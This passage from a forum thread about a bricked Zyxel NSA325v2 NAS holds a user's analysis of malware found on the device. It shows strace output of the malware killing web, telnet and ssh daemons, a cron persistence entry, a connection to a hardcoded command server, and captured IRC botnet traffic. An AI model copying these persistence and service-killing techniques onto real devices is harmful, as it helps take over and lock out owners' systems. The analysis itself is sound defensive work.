strace.1115:execve("/bin/sh", ["sh", "-c", "killall -9 mini_httpd > /dev/nul"...], 0xbee37784 /* 20 vars */) = 0
strace.1117:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x4d461c /* 12 vars */) = 0
strace.1118:execve("/bin/sh", ["sh", "-c", "killall -9 minihttpd > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1119:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x4d4674 /* 12 vars */) = 0
strace.1121:execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/thttpd.pid"...], 0xbee37784 /* 20 vars */) = 0
strace.1124:execve("/bin/sh", ["sh", "-c", "nvram set httpd_enable=0 > /dev/"...], 0xbee37784 /* 20 vars */) = 0
strace.1125:execve("/usr/bin/cat", ["cat", "/var/run/thttpd.pid"], 0x59a42c /* 12 vars */) = 0
strace.1126:execve("/usr/bin/systemctl", ["systemctl", "list-unit-files", "--full", "--type=socket"], 0x19fa2b4 /* 12 vars */) = 0
strace.1127:execve("/usr/bin/sed", ["sed", "-ne", "s/\\.socket\\s*[a-z]*\\s*$/.socket/"...], 0x19fa29c /* 12 vars */) = 0
strace.1128:execve("/bin/sh", ["sh", "-c", "nvram set http_enable=0 > /dev/n"...], 0xbee37784 /* 20 vars */) = 0
strace.1129:execve("/bin/sh", ["sh", "-c", "killall -9 httpd > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1131:execve("/bin/sh", ["sh", "-c", "service telnetd stop > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1132:execve("/usr/sbin/service", ["service", "telnetd", "stop"], 0x47466c /* 12 vars */) = 0
strace.1132:execve("/usr/local/sbin/systemctl", ["systemctl", "stop", "telnetd.service"], 0x92a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1132:execve("/usr/local/bin/systemctl", ["systemctl", "stop", "telnetd.service"], 0x92a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1132:execve("/usr/sbin/systemctl", ["systemctl", "stop", "telnetd.service"], 0x92a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1132:execve("/usr/bin/systemctl", ["systemctl", "stop", "telnetd.service"], 0x92a29c /* 12 vars */) = 0
strace.1133:execve("/bin/sh", ["sh", "-c", "service sshd stop > /dev/null 2>"...], 0xbee37784 /* 20 vars */) = 0
strace.1134:execve("/usr/sbin/service", ["service", "sshd", "stop"], 0x46466c /* 12 vars */) = 0
strace.1134:execve("/usr/local/sbin/systemctl", ["systemctl", "stop", "sshd.service"], 0x52a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1134:execve("/usr/local/bin/systemctl", ["systemctl", "stop", "sshd.service"], 0x52a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1134:execve("/usr/sbin/systemctl", ["systemctl", "stop", "sshd.service"], 0x52a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1134:execve("/usr/bin/systemctl", ["systemctl", "stop", "sshd.service"], 0x52a29c /* 12 vars */) = 0
strace.1135:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x4d461c /* 12 vars */) = 0
strace.1136:execve("/bin/sh", ["sh", "-c", "killall -9 telnetd > /dev/null 2"...], 0xbee37784 /* 20 vars */) = 0
strace.1137:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x4d4674 /* 12 vars */) = 0
strace.1139:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x46461c /* 12 vars */) = 0
strace.1140:execve("/bin/sh", ["sh", "-c", "killall -9 utelnetd > /dev/null "...], 0xbee37784 /* 20 vars */) = 0
strace.1143:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x464674 /* 12 vars */) = 0
strace.1144:execve("/bin/sh", ["sh", "-c", "killall -9 dropbear > /dev/null "...], 0xbee37784 /* 20 vars */) = 0
strace.1145:execve("/usr/bin/systemctl", ["systemctl", "list-unit-files", "--full", "--type=socket"], 0x92a2b4 /* 12 vars */) = 0
strace.1146:execve("/usr/bin/sed", ["sed", "-ne", "s/\\.socket\\s*[a-z]*\\s*$/.socket/"...], 0x92a29c /* 12 vars */) = 0
strace.1149:execve("/bin/sh", ["sh", "-c", "killall -9 sshd > /dev/null 2>&1"...], 0xbee37784 /* 20 vars */) = 0
strace.1150:execve("/usr/bin/systemctl", ["systemctl", "list-unit-files", "--full", "--type=socket"], 0x52a2b4 /* 12 vars */) = 0
strace.1151:execve("/usr/bin/sed", ["sed", "-ne", "s/\\.socket\\s*[a-z]*\\s*$/.socket/"...], 0x52a29c /* 12 vars */) = 0
strace.1153:execve("/bin/sh", ["sh", "-c", "killall -9 lighttpd > /dev/null "...], 0xbee37784 /* 20 vars */) = 0
The daemon which runs in background identifies itself as 'inet0', 'lo', 'eth0' or '-'. It's open files:
ls -l /proc/1029/fd/
lrwx------ 1 test test 64 Mar  8 17:49 0 -> 'socket:[52991]'
lrwx------ 1 test test 64 Mar  8 17:49 1 -> /dev/null
lrwx------ 1 test test 64 Mar  8 17:49 2 -> /dev/null
lr-x------ 1 test test 64 Mar  8 17:49 3 -> /home/test/tty6
lr-x------ 1 test test 64 Mar  8 17:49 4 -> /etc/issue
lr-x------ 1 test test 64 Mar  8 17:49 5 -> /etc/issue
lr-x------ 1 test test 64 Mar  8 17:49 6 -> /proc/version
lr-x------ 1 test test 64 Mar  8 17:49 7 -> /usr/bin/crontab
lrwx------ 1 test test 64 Mar  8 17:49 8 -> 'socket:[52844]'
lr-x------ 1 test test 64 Mar  8 17:49 9 -> /usr/bin/uname
It adds a line to crontab:
$ crontab -l
* * * * * /home/test/tty6 > /dev/null 2>&1 &
I suppose it also tried /etc/inittab and other targets, but it had no rights for that.
It connects to an external server, and listens on port 63008 of local host. I think that local listener is to identify itself to the process started each minute by cron.
 netstat -tapn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      529/sshd: /usr/sbin 
tcp        0      0 127.0.0.1:63008         0.0.0.0:*               LISTEN      698/inet0           
tcp        0      0 192.168.1.188:50294     66.178.182.1:8080       ESTABLISHED 698/inet0           
tcp6       0      0 :::22                   :::*                    LISTEN      529/sshd: /usr/sbin
Intercepted some traffic:
9:58:04.972842 IP (tos 0x0, ttl 64, id 188, offset 0, flags [DF], proto TCP (6), length 60)
    192.168.1.188.60104 > www.khust.tv.http-alt: Flags [S], cksum 0x02ce (incorrect -> 0x6e2f), seq 1494829240, win 64240, options [mss 1460,sackOK,TS val 1874051172 ecr 0,nop,wscale 5], length 0
E..<..@.@.7a......}&....Y.H....................
o..d........
19:58:05.019731 IP (tos 0x0, ttl 57, id 23970, offset 0, flags [DF], proto TCP (6), length 60)
    www.khust.tv.http-alt > 192.168.1.188.60104: Flags [S.], cksum 0x53f8 (correct), seq 2006717535, ack 1494829241, win 8192, options [mss 1452,nop,wscale 3,sackOK,TS val 3632435362 ecr 1874051172], length 0
E..<].@.9..z..}&........w.._Y.H... .S..............
....o..d
19:58:05.019862 IP (tos 0x0, ttl 64, id 189, offset 0, flags [DF], proto TCP (6), length 52)
    192.168.1.188.60104 > www.khust.tv.http-alt: Flags [.], cksum 0x02c6 (incorrect -> 0x9ab1), ack 1, win 2008, options [nop,nop,TS val 1874051219 ecr 3632435362], length 0
E..4..@.@.7h......}&....Y.H.w..`...........
o.......
19:58:05.973174 IP (tos 0x0, ttl 64, id 190, offset 0, flags [DF], proto TCP (6), length 112)
    192.168.1.188.60104 > www.khust.tv.http-alt: Flags [P.], cksum 0x0302 (incorrect -> 0xddf7), seq 1:61, ack 1, win 2008, options [nop,nop,TS val 1874052172 ecr 3632435362], length 60: HTTP
E..p..@.@.7+......}&....Y.H.w..`...........
o..L....NICK A6|f|1|623134|ks10
USER x00 localhost localhost :2021r

19:58:06.119665 IP (tos 0x0, ttl 57, id 24082, offset 0, flags [DF], proto TCP (6), length 52)
    www.khust.tv.http-alt > 192.168.1.188.60104: Flags [.], cksum 0x9650 (correct), ack 61, win 1016, options [nop,nop,TS val 3632436462 ecr 1874052172], length 0
E..4^.@.9.....}&........w..`Y.H......P.....
....o..L
19:58:06.433765 IP (tos 0x0, ttl 57, id 24110, offset 0, flags [DF], proto TCP (6), length 163)
    www.khust.tv.http-alt > 192.168.1.188.60104: Flags [P.], cksum 0xf870 (correct), seq 1:112, ack 61, win 1024, options [nop,nop,TS val 3632436775 ecr 1874052172], length 111: HTTP
E...^.@.9.....}&........w..`Y.H......p.....
...'o..L:IRC!IRC@0x.25 PRIVMSG A6|f|1|623134|ks10 :.VERSION.
:. 010 . 127.0.0.1 6667 :
:. 005 . :
:. 376 . :
Not very readable.

So far I have not been able to dump the decompressed/decrypted executable.

Maybe it's a good idea to remove the download link. The file is dangerous.
Re: Zyxel NSA325v2 brick
March 08, 2022 01:17PM
Very good investigation Mijzelf, this file come form the last fonzplug (ffp) installation on my NAS325v2. After I installed Debian on it, I removed the whole dir.
Re: Zyxel NSA325v2 brick
March 08, 2022 03:41PM
Really? How old was that installation? I'm a bit surprised that the command server apparently still works. As far as I could see there was no dns request, so the IP address is hardcoded. I wouldn't expect the command server to be longer than a few days on the same address. But who knows? The reverse dns of tcpdump says the IP address is www.khust.tv, which is Russian. A takedown might be difficult.
Author:

Your Email:


Subject:


Spam prevention:
Please, enter the code that you see below in the input field. This is for blocking bots that try to post this form automatically. If the code is hard to read, then just try to guess it right. If you enter the wrong code, a new image is created and you get another chance to enter it right.
Message: